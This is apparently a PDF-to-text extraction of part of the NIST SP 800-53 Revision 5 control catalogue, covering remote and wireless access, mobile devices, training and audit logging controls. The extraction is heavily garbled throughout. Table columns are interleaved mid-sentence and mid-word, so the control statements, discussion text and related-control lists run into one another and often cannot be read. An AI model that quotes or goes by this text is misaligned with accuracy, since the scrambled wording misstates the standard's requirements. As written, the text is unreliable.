system components. organization-defined security and privacy policies]. organizations provide a consistent interpretation of security and privacy attributes employed in
AC-16(8) Security and Privacy Attributes | Association Techniques and Technologies Implement [Assignment: organization-defined techniques and technologies] in associating security andThe association of security and privacy attributes to information within systems is important for conducting SC-12, SC-13.
automated access enforcement and flow enforcement actions. The association of such attributes
access enforcement and flow enforcement decisions. Organizations can establish agreements and
AC-16(9) Security and Privacy Attributes | Attribute Reassignment — Regrading Mechanisms Change security and privacy attributes associated with information only via regrading mechanisms processes A regradingtomechanism
help ensureisthat a trusted
distributedprocess authorized
system components to re-classify
implement and re-label
attributes data in accordance
with consistent None.
AC-16(10) Security and Privacy Attributes | Attribute Configuration by Authorized Individuals validated using [Assignment:
Provide authorized individualsorganization-defined
the capability to define techniques
or change or the
procedures].
type and value of security and with a defined
The content or policy
assigned exception.
values ofValidated
security regrading
and privacy mechanisms
attributes can are directly
used byaffectorganizations
the ability toof None.
privacy attributes availableusage for association with subjects and objects. requirements, and provide theto
individuals requisite
access levels of assurance
organizational for attribute
information. reassignment activities. Theto validation is limit
AC-17 Remote Access a. Establish and document restrictions, configuration/connection Remote
facilitatedaccess is access
by create
ensuring to organizational systemsThus, it is important
(or processes actingfor onsystems
behalf be ablethat
of users) to commAC-2, AC-3, AC-4, AC-18, AC-19, AC-20, CA-3, CM-10, IA-2, IA-3, IA-8, MA-4, PE-17, PL-2,
implementation guidance for each the ability to or that
modify regrading
the typemechanismsand value ofare single purpose
attributes available and forofassociation
limited function.
with Since PL-4, SC-10, SC-12, SC-13, SI-4.
AC-17(1) Remote Access | Monitoring and Control Employ automated mechanisms to type
monitorof remote accessremote
and control allowed; and methods.
access Monitoring
subjects andand control
objects of remote access
to authorized individuals methods only.allows organizations to detect attacks and help ensAU-2, AU-6, AU-12, AU-14.
AC-17(2) Remote Access | Protection of Confidentiality and Integrity Using Encryption Implement cryptographic mechanisms to protect the confidentiality and integrity of remote access seVirtual private networks can be used to protect the confidentiality and integrity of remote access s SC-8, SC-12, SC-13.
AC-17(3) Remote Access | Managed Access Control Points Route remote accesses through authorized and managed network access control points. Organizations consider the Trusted Internet Connections (TIC) initiative DHS TIC requirements for extSC-7.
AC-17(4) Remote Access | Privileged Commands and Access (a) Authorize the execution of privileged commands and access to security-relevant information via Remote access to systems represents a significant potential vulnerability that can be exploited by advAC-6, SC-12, SC-13.
AC-19(3) Access Control for Mobile Devices | Use of Portable Storage Devices with No Identifiable Owner remote access only in a format
[Withdrawn: Incorporated into MP-7.] that provides assessable evidence and for the following needs:
[Assignment: organization-defined needs]; and
AC-17(6) Remote Access | Protection of Mechanism Information Protect information about remote access mechanisms from unauthorized use and disclosure. Remote access to organizational information by non-organizational entities can increase the risk of AT-2, AT-3, PS-6.
AC-2(10) Account Management | Shared and Group Account Credential Change [Withdrawn: Incorporated into AC-2k.]
AC-3(1) Access Enforcement | Restricted Access to Privileged Functions [Withdrawn: Incorporated into AC-6.]
AC-17(9) Remote Access | Disconnect or Disable Access Provide the capability to disconnect or disable remote access to the system within [Assignment: The speed of system disconnect or disablement varies based on the criticality of missions or None.
AC-17(10) Remote Access | Authenticate Remote Commands organization-defined
Implement [Assignment: timeorganization-defined
period]. mechanisms] to authenticate [Assignment: organizat business functions
Authenticating remote and commands
the need toprotects eliminateagainst immediate or futurecommands
unauthorized remote access and to thesystems.
replay of authorize SC-12, SC-13, SC-23.
AC-18 Wireless Access a. Establish configuration requirements, connection requirements, and implementation guidance Wireless technologies include microwave, packet radio (ultra-high frequency or very high frequency) AC-2, AC-3, AC-17, AC-19, CA-9, CM-7, IA-2, IA-3, IA-8, PL-4, SC-40, SC-43, SI-4.
AC-18(1) Wireless Access | Authentication and Encryption for eachwireless
Protect type of wireless
access toaccess;
the system and using authentication of [Selection (one or more): users; devicesWireless networking capabilities represent a significant potential vulnerability that can be exploited SC-8, SC-12, SC-13.
AC-3(6) Access Enforcement | Protection of User and System Information [Withdrawn: Incorporated into MP-4 and SC-28.]
AC-18(3) Wireless Access | Disable Wireless Networking Disable, when not intended for use, wireless networking capabilities embedded within system Wireless networking capabilities that are embedded within system components represent a None.
AC-18(4) Wireless Access | Restrict Configurations by Users components prior to issuance
Identify and explicitly authorizeand usersdeployment.
allowed to independently configure wireless networking capabilsignificant Organizational potential vulnerability
authorizations that can
to allow be exploited
selected users toby adversaries.
configure Disabling
wireless wireless
networking capabilities SC-7, SC-15.
capabilities when not needed for essential organizational missions or functions can reduce
AC-18(5) Wireless Access | Antennas and Transmission Power Levels Select radio antennas and calibrate transmission power levels to reduce the probability that signals susceptibility Actions that may be taken
to threats by to limit unauthorized
adversaries involving use of wireless
wireless communications outside of organizatio
technologies. PE-19.
AC-19 Access Control for Mobile Devices a. Establish configuration requirements, connection requirements, and implementation guidance A mobile device is a computing device that has a small form factor such that it can easily be carried AC-3, AC-4, AC-7, AC-11, AC-17, AC-18, AC-20, CA-9, CM-2, CM-6, IA-2, IA-3, MP-2, MP-4,
AC-4(16) Information Flow Enforcement | Information Transfers on Interconnected Systems for organization-controlled
[Withdrawn: Incorporated into mobile AC-4.]devices, to include when such devices are outside of controlled by a single individual; is designed to operate without a physical connection; possesses local, non- MP-5, MP-7, PL-4, SC-7, SC-34, SC-43, SI-3, SI-4.
areas; and removable or removable data storage; and includes a self-contained power source. Mobile device
AC-4(18) Information Flow Enforcement | Security Attribute Binding [Withdrawn: Incorporated into AC-16.] functionality may also include voice communication capabilities, on-board sensors that allow the
AC-7(1) Unsuccessful Logon Attempts | Automatic Account Lock [Withdrawn: Incorporated into AC-7.]
AC-19(4) Access Control for Mobile Devices | Restrictions for Classified Information (a) Prohibit the use of unclassified mobile devices in facilities containing systems processing, None. CM-8, IR-4.
AC-19(5) Access Control for Mobile Devices | Full Device or Container-based Encryption storing, or transmitting
Employ [Selection: classified
full-device information
encryption; unless specifically
container-based permitted
encryption] by the authorizing
to protect the confidentiality Container-based encryption provides a more fine-grained approach to data and information encryption SC-12,
o SC-13, SC-28.
official; and
AC-20 Use of External Systems a. [Selection (one or more): Establish [Assignment: organization-defined terms and conditions]; External systems are systems that are used by but not part of organizational systems, and for which AC-2, AC-3, AC-17, AC-19, CA-3, PL-2, PL-4, SA-9, SC-7.
AC-20(1) Use of External Systems | Limits on Authorized Use Identifyauthorized
Permit [Assignment: organization-defined
individuals to use an external controls asserted
system to bethe
to access implemented
system or toonprocess,
externalstore, or the organization
Limiting authorized hasuse no recognizes
direct control over the implementation
circumstances where individuals of required controlssystems
using external or the may needCA-2.
systems]],organization-controlled
transmit consistent with the trust relationships
information onlyestablished
after: with other organizations owning, assessment of control effectiveness. External systems include personally owned systems,
AC-20(2) Use of External Systems | Portable Storage Devices — Restricted Use Restrict theand/or
operating, use of maintaining
organization-controlled
external systems, portable storage
allowing devices by
authorized authorized
individuals to:individuals on exteLimits on the use
components, of organization-controlled
or devices; privately owned computing portable and storage devices in external
communications devices systems include re
in commercial or MP-7, SC-41.
AC-20(3) Use of External Systems | Non-organizationally Owned Systems — Restricted Use Restrict the use of non-organizationally owned systems or system components to process, store, or Non-organizationally owned systems or system components include systems or system components None.
AC-20(4) Use of External Systems | Network Accessible Storage Devices — Prohibited Use transmitthe
Prohibit organizational information
use of [Assignment: using [Assignment:network
organization-defined organization-defined
accessible storage restrictions].
devices] in owned by other organizations
Network-accessible storage devices as wellinas personally
external owned
systems devices.
include online There are potential
storage devices inrisks to
public, None.
external systems. using non-organizationally owned systems systems.orportable components. In some cases, the risk is sufficiently high
AC-20(5) Use of External Systems | Portable Storage Devices — Prohibited Use Prohibit the use of organization-controlled portable storage devices by authorized individuals on ext hybrid, Limits
as
orthe
on
to prohibit
community
use
suchofuse
cloud-based
organization-controlled
(see AC-20 b.). In other cases, storage
the use of devices in external
such systems systems include a c MP-7, PL-4, PS-6, SC-41.
or system
AC-21 Information Sharing a. Enable authorized users to determine whether access authorizations assigned to a sharing Information sharing applies to information that may be restricted in some manner based on some forma AC-3, AC-4, AC-16, PT-2, PT-7, RA-3, SC-15.
AC-21(1) Information Sharing | Automated Decision Support partner match the information’s
Employ [Assignment: access andautomated
organization-defined use restrictions for [Assignment:
mechanisms] to enforce organization-defined
information-sharing Automated mechanisms are used to enforce information sharing decisions. None.
information
decisions sharing
byinformation
authorized circumstances
users based where user authorizations
on access discretion is required];
of sharing and partnersorganization-
and access
AC-21(2) Information Sharing | Information Search and Retrieval Implement search and retrieval services that enforce [Assignment: Information search and retrieval services identify information system resources relevant to an None.
restrictions
defined on information
information sharing torestrictions].
be shared. information need.
AC-22 Publicly Accessible Content a. Designate individuals authorized to make information publicly accessible; In accordance with applicable laws, executive orders, directives, policies, regulations, standards, a AC-3, AT-2, AT-3, AU-13.
AC-23 Data Mining Protection b. Train authorized individuals to ensure that publicly accessible information does not contain
Employ [Assignment: organization-defined data mining prevention and detection techniques] for [AssData mining is an analytical process that attempts to find correlations or patterns in large data sets PM-12, PT-2.
nonpublic information; for the control
purposedecisions
of data or knowledge discovery. Data storage objects
AC-24 Access Control Decisions [Selection: Establish procedures; Implement mechanisms] to ensure [Assignment: organization-defined Access (also known as authorization decisions) occurinclude database records
when authorization and AC-2, AC-3.
informatio
database fields. Sensitive information can be extracted from data mining operations. When
AC-24(1) Access Control Decisions | Transmit Access Authorization Information Transmit [Assignment: organization-defined access authorization information] using [Assignment: orginformation Authorization is processes
personallyand access control
identifiable information,decisions it maymaylead occur to in separate parts
unanticipated of systems
revelations or in sepAU-10.
about
AC-24(2) Access Control Decisions | No User or Process Identity Enforce access control decisions based on [Assignment: organization-defined security or privacy In certain situations, it is important that access control decisions can be made without information None.
AC-25 Reference Monitor attributes]
Implement that do not include
a reference monitorthe foridentity of the organization-defined
[Assignment: user or process actingaccess on behalf of the
control user. that is regarding
policies] A reference the identityisof
monitor theof
a set users
design issuing the requests.
requirements on aThese
referenceare generally
validationinstances
mechanism where that, as a keAC-3, AC-16, SA-8, SA-17, SC-3, SC-11, SC-39, SI-13.
preserving individual privacy is of paramount importance. In other situations, user identification
AT-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: information Awareness and training
is simply notpolicy
needed andfor procedures
access control address the controls
decisions, in the AT in
and especially family
the casethat ofare implement PM-9, PS-8, SI-12.
AT-2 Literacy Training and Awareness 1. Provide
a. [Selection (one orand
security more):
privacy Organization-level;
literacy training to Mission/business process-level;
system users (including System-level]
managers, senior Organizations provide basic and advanced levels of literacy training to system users, including AC-3, AC-17, AC-22, AT-3, AT-4, CP-3, IA-4, IR-2, IR-7, IR-9, PL-4, PM-13, PM-21, PS-7, PT-
awareness and
executives, andtraining policy that:
contractors): measures to test the knowledge levelsocial
of users. Organizations determine the content of literacy 2, SA-8, SA-16.
AT-2(1) Literacy Training and Awareness | Practical Exercises Provide practical exercises in literacy training that simulate events and incidents. Practical exercises include no-notice engineering attempts to collect information, gain unauthoCA-2, CA-7, CP-4, IR-3.
training and awareness based on specific organizational requirements, the systems to which
AT-2(2) Literacy Training and Awareness | Insider Threat Provide literacy training on recognizing and reporting potential indicators of insider threat. Potential indicators
personnel have authorized and possible
access, precursors
and work of insider threat(e.g.,
environments can telework).
include behaviorsThe content such includes
as inordin an PM-12.
AT-2(3) Literacy Training and Awareness | Social Engineering and Mining Provide literacy training on recognizing and reporting potential and actual instances of social Social engineering is an attempt to trick an individual into revealing information or taking an action None.
AT-2(4) Literacy Training and Awareness | Suspicious Communications and Anomalous System Behavior engineering
Provide literacyandtraining
social mining.
on recognizing suspicious communications and anomalous behavior in that can be used
A well-trained to breach,
workforce compromise,
provides anotherororganizational
otherwise adversely controlimpactthat can a system.
be employed Socialas part of a None.
organizational engineering includes phishing, pretexting, impersonation, baiting, quid pro quo, thread-jacking,
AT-2(5) Literacy Training and Awareness | Advanced Persistent Threat Provide literacysystems
trainingusingon the [Assignment: organization-defined
advanced persistent threat. indicators of malicious code]. defense-in-depth
An effective
social media way strategy
to detectand
exploitation,
to protect
advanced
tailgating.
against
persistent
Social
malicious
threatsis
mining
code
(APT) coming
and to into
an attempt
organizations
preclude
to gathersuccessful
information
via email is
attacks
about
orto None.
the web
provide applications.
specific Personnel
literacytotraining are trained to look for indications of potentially suspicious email
AT-2(6) Literacy Training and Awareness | Cyber Threat Environment (a) Provide literacy training on the cyber threat environment; and Since receiving
(e.g., threats continue
an unexpected changefor overindividuals.
time, threat Threat
literacyliteracy training
training by includes
the educating
organization is dynamic.or M RA-3.
(b) Reflect current cyber threat information in system operations. individuals on the various waysemail, that APTsreceiving an email
can infiltrate containing
the organization strange or through
(e.g., poor grammar, websites,
AT-3 Role-based Training a. Provide role-based security and privacy training to personnel with the following roles and Organizations
emails, determine
advertisement the content
pop-ups, articles, of training
and social based on the assigned
engineering). Effective roles and responsibilities
training includes of AC-3, AC-17, AC-22, AT-2, AT-4, CP-3, IR-2, IR-4, IR-7, IR-9, PL-4, PM-13, PM-23, PS-7, PS-
AT-3(1) Role-based Training | Environmental Controls responsibilities:
Provide [Assignment: [Assignment: organization-defined
organization-defined personnel roles and responsibilities]:
or roles] with initial and [Assignment: organiz individualsEnvironmental as well as theinclude
controls security and
fire privacy requirements
suppression and detection of organizations
devices or systems, and the systemssystems,
sprinkler to 9, SA-3,
PhE-1, SA-8,PE-13,
PE-11, SA-11,PE-14,
SA-16,PE-15.
SR-5, SR-6, SR-11.
which personnel have authorized access, including technical training specifically tailored for
AT-3(2) Role-based Training | Physical Security Controls Provide [Assignment: organization-defined personnel or roles] with initial and [Assignment: organiza assigned Physical security
duties. Rolescontrols thatinclude
may require physical access control
role-based training devices,
include physical
senior intrusion
leaders orand detection al PE-2, PE-3, PE-4.
management
AT-3(3) Role-based Training | Practical Exercises Provide practical exercises in security and privacy training that reinforce training objectives. Practical exercises for security include training for software developers that addresses simulated None.
AT-3(4) Role-based Training | Suspicious Communications and Anomalous System Behavior [Withdrawn: Moved to AT-2(4)]. attacks that exploit common software vulnerabilities or spear or whale phishing attacks targeted at
senior leaders or executives. Practical exercises for privacy include modules with quizzes on
AT-3(5) Role-based Training | Processing Personally Identifiable Information Provide [Assignment: organization-defined personnel or roles] with initial and [Assignment: organiza identifying Personally identifiable
and processing information
personally processing
identifiable andinformation
transparency controlsscenarios
in various include the organization’s
or scenarios on PT-2, PT-3, PT-5, PT-6.
AT-4 Training Records a. Document and monitor information security and privacy training activities, including security and Documentation for specialized training may be maintained by individual supervisors at the discretionAT-2, AT-3, CP-3, IR-2, PM-14, SI-12.
AT-5 Contacts with Security Groups and Associations privacy awareness training
[Withdrawn: Incorporated into PM-15.] and specific role-based security and privacy training; and
AT-6 Training Feedback Provide feedback on organizational training results to the following personnel [Assignment: Training feedback includes awareness training results and role-based training results. Training None.
AU-1 Policy and Procedures organization-defined
a. Develop, document,frequency]: and disseminate [Assignment: organization-defined
to [Assignment: personnel].
organization-defined personnel or roles]: results,
Audit and especially failurespolicy
accountability of personnel
and procedures in criticaladdress
roles, can thebe indicative
controls in theof AU
a potentially
family that serious
are impleme PM-9, PS-8, SI-12.
AU-2 Event Logging 1. [Selection
a. Identify the(one
typesor of
more):
events Organization-level;
that the system isMission/business
capable of logging process-level;
in support ofSystem-level] audit problem.
the audit function: An event
Therefore, it is important that senior managers are made aware of such situations so that
is anappropriate
observable occurrence in a system. Thefeedback
types of supports
events that
and accountability policy that: they can take response actions. Training therequire
evaluation loggingandare update AC-2, AC-3, AC-6, AC-7, AC-8, AC-16, AC-17, AU-3, AU-4, AU-5, AU-6, AU-7, AU-11, AU-12,
AU-10(5) Non-repudiation | Digital Signatures [Assignment: organization-defined
[Withdrawn: Incorporated into SI-7.] event types that the system is capable of logging]; those events that are significant and relevant to the security of systems and the privacy of CM-3, CM-5, CM-6, CM-13, IA-3, MA-4, MP-4, PE-3, PM-21, PT-2, PT-7, RA-8, SA-8, SC-7,
individuals. Event logging also supports specific monitoring and auditing needs. Event types include SC-18, SI-3, SI-4, SI-7, SI-10, SI-11.
AU-14(2) Session Audit | Capture and Record Content [Withdrawn: Incorporated into AU-14.] password changes, failed logons or failed accesses related to systems, security or privacy attribute
AU-15 Alternate Audit Logging Capability [Withdrawn: Moved to AU-5(5).]
AU-2(1) Event Logging | Compilation of Audit Records from Multiple Sources [Withdrawn: Incorporated into AU-12.]
AU-3 Content of Audit Records Ensure that audit records contain information that establishes the following: Audit record content that may be necessary to support the auditing function includes event descriptions AU-2, AU-8, AU-12, AU-14, MA-4, PL-9, SA-8, SI-7, SI-11.
AU-3(1) Content of Audit Records | Additional Audit Information a. What type
Generate auditof records
event occurred;
containing the following additional information: [Assignment: organization- The ability to add information generated in audit records is dependent on system functionality to None.
AU-2(2) Event Logging | Selection of Audit Events by Component defined additional
[Withdrawn: information].
Incorporated into AU-12.] configure the audit record content. Organizations may consider additional information in audit
records including, but not limited to, access control or flow control rules invoked and individual
AU-3(3) Content of Audit Records | Limit Personally Identifiable Information Elements Limit personally identifiable information contained in audit records to the following elements identif identities Limiting personally
of group accountidentifiable users. information
Organizations in audit
mayrecords when such
also consider information
limiting additionalis audit
not needed
record for RA-3.

2 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

AU-4 Audit Log Storage Capacity Allocate audit log storage capacity to accommodate [Assignment: organization-defined audit log reteOrganizations consider the types of audit logging to be performed and the audit log processing requirem AU-2, AU-5, AU-6, AU-7, AU-9, AU-11, AU-12, AU-14, SI-4.
AU-4(1) Audit Log Storage Capacity | Transfer to Alternate Storage Transfer audit logs [Assignment: organization-defined frequency] to a different system, system Audit log transfer, also known as off-loading, is a common process in systems with limited audit log None.
AU-5 Response to Audit Logging Process Failures component,
a. or mediaorganization-defined
Alert [Assignment: other than the system or system
personnel orcomponent
roles] within conducting
[Assignment: the organization-
logging. storage capacity
Audit logging processand thus failuressupports
include availability
software of and the audit logs.
hardware The initial
errors, failures audit log storage
in audit is only meAU-2, AU-4, AU-7, AU-9, AU-11, AU-12, AU-14, SI-4, SI-12.
log capturing
AU-5(1) Response to Audit Logging Process Failures | Storage Capacity Warning defined
Provide atimewarning period]to in the event oforganization-defined
[Assignment: an audit logging process and and/or locations] within used
failure;roles,
personnel,
in a transitory fashion until the system can communicate with the secondary or alternate
Organizations maytohave
system allocated auditmultiple
log storage, auditatlog storage
which point repositories
the audit logs distributed across multiple
are transferred. system None.
Transferring
AU-5(2) Response to Audit Logging Process Failures | Real-time Alerts [Assignment:
Provide an alert organization-defined
within [Assignment: time period] when allocated
organization-defined auditperiod]
real-time log storage volume reaches
to [Assignment: components
Alerts providewith each repository
organizations havingmessages.
with urgent different storage
Real-time volume
alertscapacities.
provide these messages at None.
[Assignment:
organization-defined organization-defined
personnel, percentage] of
roles, and/or locations]repository maximum
whenthresholds audit
the following log storage
audit failure capacity.
AU-5(3) Response to Audit Logging Process Failures | Configurable Traffic Volume Thresholds Enforce configurable network communications traffic volume reflecting limits events information technology
on audit Organizations have the capability speed (i.e., tothe
rejecttime orfrom
delayevent detection to
the processing of alert
network occurs in seconds or
communications None.
occur:
log [Assignment:
storage capacity organization-defined
and [Selection: reject; audit
delay]logging
network failure events
traffic above requiring
those real-time alerts].
thresholds. less). if audit logging information about such traffic is determined to exceed the storage capacity of
traffic
AU-5(4) Response to Audit Logging Process Failures | Shutdown on Failure Invoke a [Selection: full system shutdown; partial system shutdown; degraded operational mode withOrganizations lim determine the types of audit logging failures that can trigger automatic system shutdo AU-15.
the system audit logging function. The rejection or delay response is triggered by the established
AU-5(5) Response to Audit Logging Process Failures | Alternate Audit Logging Capability Provide an alternate audit logging capability in the event of a failure in primary audit logging capabi organizational Since an alternate trafficauditvolume logging capabilitythat
thresholds may canbebe a short-term
adjusted based protection
on changes solution employed
to audit until theAU-9.
log storage
AU-6 Audit Record Review, Analysis, and Reporting a. Review and analyze system audit records [Assignment: organization-defined frequency] for Audit record review, analysis, and reporting covers information security- and privacy-related loggin AC-2, AC-3, AC-5, AC-6, AC-7, AC-17, AU-7, AU-16, CA-2, CA-7, CM-2, CM-5, CM-6, CM-10,
AU-6(1) Audit Record Review, Analysis, and Reporting | Automated Process Integration indications
Integrate audit of [Assignment:
record review, organization-defined
analysis, and reporting inappropriate
processesor unusual
using activity] and
[Assignment: the
organization-d Organizational processes that benefit from integrated audit record review, analysis, and reporting in CM-11, PM-7. IA-2, IA-3, IA-5, IA-8, IR-5, MA-4, MP-4, PE-3, PE-6, RA-5, SA-8, SC-7, SI-3, SI-4, SI-
potential impact of the inappropriate or unusual activity; 7.
AU-2(3) Event Logging | Reviews and Updates [Withdrawn: Incorporated into AU-2.]
AU-6(3) Audit Record Review, Analysis, and Reporting | Correlate Audit Record Repositories Analyze and correlate audit records across different repositories to gain organization-wide situation Organization-wide situational awareness includes awareness across all three levels of risk management AU-12, IR-4.
AU-6(4) Audit Record Review, Analysis, and Reporting | Central Review and Analysis Provide and implement the capability to centrally review and analyze audit records from multiple co Automated mechanisms for centralized reviews and analyses include Security Information and Even AU-2, AU-12.
AU-6(5) Audit Record Review, Analysis, and Reporting | Integrated Analysis of Audit Records Integrate analysis of audit records with analysis of [Selection (one or more): vulnerability scanning Integrated analysis of audit records does not require vulnerability scanning, the generation of perfor AU-12, IR-4.
AU-6(6) Audit Record Review, Analysis, and Reporting | Correlation with Physical Monitoring Correlate information from audit records with information obtained from monitoring physical The correlation of physical audit record information and the audit records from systems may assist None.
AU-6(7) Audit Record Review, Analysis, and Reporting | Permitted Actions access to
Specify the further
permittedenhanceactionstheforability
eachto[Selection
identify suspicious,
(one or more):inappropriate, unusual,
system process; or user]
role; malevolent organizations in
Organizations identifying
specify permitted suspicious
actionsbehavior
for system or supporting
processes, evidence
roles, andofusers suchassociated
behavior. For with the None.
activity. with the review, analysis, and reporting of audit record information.
associated example, the correlation of an individual’s identity for logical access to certain systemsactivities.
with the
AU-6(8) Audit Record Review, Analysis, and Reporting | Full Text Analysis of Privileged Commands Perform a full text analysis of logged privileged commands in a physically distinct component or subsyreview, Full textanalysis,
additional analysis
physical
and reporting
of security
privileged of audit records
commands requires through
a distinctsystem account
environment management
atfor the analysis of the
audit r AU-3, AU-9, AU-11, AU-12.
Specifying permitted actionsinformation
on audit record that the individual
information iswas
a way present
to enforce thethefacility when
principle of least
AU-6(9) Audit Record Review, Analysis, and Reporting | Correlation with Information from Nontechnical Sour Correlate information from nontechnical sources with audit record information to enhance organizatNontechnical sources include records that document organizational
privilege. Permitted actions are enforced by the system and include read, write, execute, append, policy violations related to harassmPM-12.
AU-2(4) Event Logging | Privileged Functions [Withdrawn: Incorporated into AC-6(9).]
AU-7 Audit Record Reduction and Report Generation Provide and implement an audit record reduction and report generation capability that: Audit record reduction is a process that manipulates collected audit log information and organizes it AC-2, AU-2, AU-3, AU-4, AU-5, AU-6, AU-12, AU-16, CM-5, IA-5, IR-4, PM-12, SI-4.
AU-7(1) Audit Record Reduction and Report Generation | Automatic Processing a. Supports
Provide andon-demand
implement the audit record review,
capability analysis,
to process, sort,and
andreporting requirements
search audit records forand after-the-fact
events of Events of interest can be identified by the content of audit records, including system resources None.
investigations
interest of
onincidents;
basedIncorporated
the following and content: [Assignment: organization-defined fields within audit involved, information objects accessed, identities of individuals, event types, event locations, event
AU-3(2) Content of Audit Records | Centralized Management of Planned Audit Record Content [Withdrawn: into PL-9.]
records]. dates and times, Internet Protocol addresses involved, or event success or failure. Organizations
AU-8 Time Stamps a. Use internal system clocks to generate time stamps for audit records; and Time stamps generated by the system include date and time.
may define event criteria to any degree of granularity required, such as locations selectable by a Time is commonly expressed in Coordinated
AU-3, AU-12, AU-14, SC-45.
AU-6(10) Audit Record Review, Analysis, and Reporting | Audit Level Adjustment b. Record time
[Withdrawn: stamps for audit
Incorporated records that meet [Assignment: organization-defined granularity of
into AU-6.]
time measurement] and that use Coordinated Universal Time, have a fixed local time offset from
AU-6(2) Audit Record Review, Analysis, and Reporting | Automated Security Alerts [Withdrawn: Universal
Coordinated Incorporated Time, into
or SI-4.]
that include the local time offset as part of the time stamp.
AU-9 Protection of Audit Information a. Protect audit information and audit logging tools from unauthorized access, modification, and Audit information includes all information needed to successfully audit system activity, such as audit AC-3, AC-6, AU-6, AU-11, AU-14, AU-15, MP-2, MP-4, PE-2, PE-3, PE-6, SA-8, SC-8, SI-4.
AU-9(1) Protection of Audit Information | Hardware Write-once Media deletion;
Write audit and trails to hardware-enforced, write-once media. Writing audit trails to hardware-enforced, write-once media applies to the initial generation of audit AU-4, AU-5.
AU-9(2) Protection of Audit Information | Store on Separate Physical Systems or Components Store audit records [Assignment: organization-defined frequency] in a repository that is part of a p Storing audit records in a repository separate from the audited system or system component helps toAU-4, AU-5.
AU-9(3) Protection of Audit Information | Cryptographic Protection Implement cryptographic mechanisms to protect the integrity of audit information and audit tools. Cryptographic mechanisms used for protecting the integrity of audit information include signed hash AU-10, f SC-12, SC-13.
AU-9(4) Protection of Audit Information | Access by Subset of Privileged Users Authorize access to management of audit logging functionality to only [Assignment: organization-defin Individuals or roles with privileged access to a system and who are also the subject of an audit by thatAC-5.
AU-9(5) Protection of Audit Information | Dual Authorization Enforce dual authorization for [Selection (one or more): movement; deletion] of [Assignment: organizOrganizations may choose different selection options for different types of audit information. Dual AC-3.
AU-9(6) Protection of Audit Information | Read-only Access Authorize read-only access to audit information to [Assignment: organization-defined subset of Restricting privileged user or role authorizations to read-only helps to limit the potential damage to None.
AU-9(7) Protection of Audit Information | Store on Component with Different Operating System privileged
Store auditusers or roles].on a component running a different operating system than the system or co organizations
information Storing auditing that could be initiated
information on a system by such users or roles,
component running such as deleting
a different audit records
operating systemto cover the
reduces AU-4,
r AU-5, AU-11, SC-29.
up malicious activity.
AU-10 Non-repudiation Provide irrefutable evidence that an individual (or process acting on behalf of an individual) has pe Types of individual actions covered by non-repudiation include creating information, sending and recAU-9, PM-12, SA-8, SC-8, SC-12, SC-13, SC-16, SC-17, SC-23.
AU-10(1) Non-repudiation | Association of Identities (a) Bind the identity of the information producer with the information to [Assignment: organization- Binding identities to the information supports audit requirements that provide organizational personAC-4, AC-16.
AU-10(2) Non-repudiation | Validate Binding of Information Producer Identity defined
(a) strength
Validate of binding];
the binding of theand information producer identity to the information at [Assignment: Validating the binding of the information producer identity to the information prevents the modifica AC-3, AC-4, AC-16.
AU-10(3) Non-repudiation | Chain of Custody organization-defined
Maintain reviewer or frequency]; and
releaser credentials within the established chain of custody for information rev Chain of custody is a process that tracks the movement of evidence through its collection, safeguardiAC-4, AC-16.
AU-10(4) Non-repudiation | Validate Binding of Information Reviewer Identity (a) Validate the binding of the information reviewer identity to the information at the transfer or Validating the binding of the information reviewer identity to the information at transfer or release AC-4, AC-16.
AU-7(2) Audit Record Reduction and Report Generation | Automatic Sort and Search release pointsIncorporated
[Withdrawn: prior to release intoorAU-7(1).]
transfer between [Assignment: organization-defined security
domains]; and
AU-11 Audit Record Retention Retain audit records for [Assignment: organization-defined time period consistent with records retentOrganizations retain audit records until it is determined that the records are no longer needed for a AU-2, AU-4, AU-5, AU-6, AU-9, AU-14, MP-6, RA-5, SI-12.
AU-11(1) Audit Record Retention | Long-term Retrieval Capability Employ [Assignment: organization-defined measures] to ensure that long-term audit records Organizations need to access and read audit records requiring long-term storage (on the order of None.
AU-12 Audit Record Generation generated
a. Provide auditby therecord
system can be retrieved.
generation capability for the event types the system is capable of auditing as years). Measures
Audit records canemployed
be generated to helpfromfacilitate the retrieval
many different system of components.
audit records The include
event converting
types specified inAC-6, A AC-17, AU-2, AU-3, AU-4, AU-5, AU-6, AU-7, AU-14, CM-5, MA-4, MP-4, PM-12, SA-
defined in AU-2a on [Assignment: organization-defined system components]; records to newer formats, retaining equipment capable of reading the records, and retaining the
AU-12(1) Audit Record Generation | System-wide and Time-correlated Audit Trail Compile audit records from [Assignment: organization-defined system components] into a system-wide Audit(lo trailsdocumentation
necessary are time-correlated to help if the time stamps
personnel in the individual
understand how to interpretaudit records
the records.can be reliably rela 8, SC-18,
AU-8, SI-3, SI-4, SI-7, SI-10.
SC-45.
AU-12(2) Audit Record Generation | Standardized Formats Produce a system-wide (logical or physical) audit trail composed of audit records in a standardized Audit records that follow common standards promote interoperability and information exchange None.
AU-12(3) Audit Record Generation | Changes by Authorized Individuals format. between devices and systems. Promoting
Provide and implement the capability for [Assignment: organization-defined individuals or roles] to Permitting authorized individuals to make changes to system logging enables organizations to extendAC-3. interoperability and information exchange facilitates the or
production of event information that can be readily analyzed and correlated. If logging mechanisms
AU-12(4) Audit Record Generation | Query Parameter Audits of Personally Identifiable Information Provide and implement the capability for auditing the parameters of user query events for data sets do Querynot parameters
conform to are explicit criteria
standardized formats, thatsystems
an individual or automated
may convert individual system
auditsubmits
recordsto a system None.
into
AU-13 Monitoring for Information Disclosure containing
a. Monitor personally
[Assignment: identifiable information.open-source information and/or information sites]
organization-defined to retrieve data.
Unauthorized Auditingofofinformation
disclosure query parameters is a form forofdatasets that contain
data leakage. Open-sourcepersonally identifiable
information includes sAC-22, PE-3, PM-12, RA-5, SC-7, SI-20.
[Assignment: organization-defined frequency] for evidence of [Assignment:
unauthorized organization-defined
disclosure of information augments the capability of an organization to track and understand the access, usage,
AU-13(1) Monitoring for Information Disclosure | Use of Automated Tools Monitor open-source information and information sites using Automated
or sharing ofmechanisms include commercial
personally identifiable information services that provide
by authorized notifications and alerts to
personnel. None.
organizational
automated information; and
AU-13(2) Monitoring for Information Disclosure | Review of Monitored Sites Review the mechanisms].
list of open-source information sites being monitored [Assignment: organization- organizations
Reviewing theandcurrentautomated scripts to monitor
list of open-source new posts
information sites onbeingwebsites.
monitored on a regular basis helps None.
AU-13(3) Monitoring for Information Disclosure | Unauthorized Replication of Information defined discovery
Employ frequency]. techniques, processes, and tools to determine if external entities are replicating The to ensure that the use
unauthorized selected sites remain
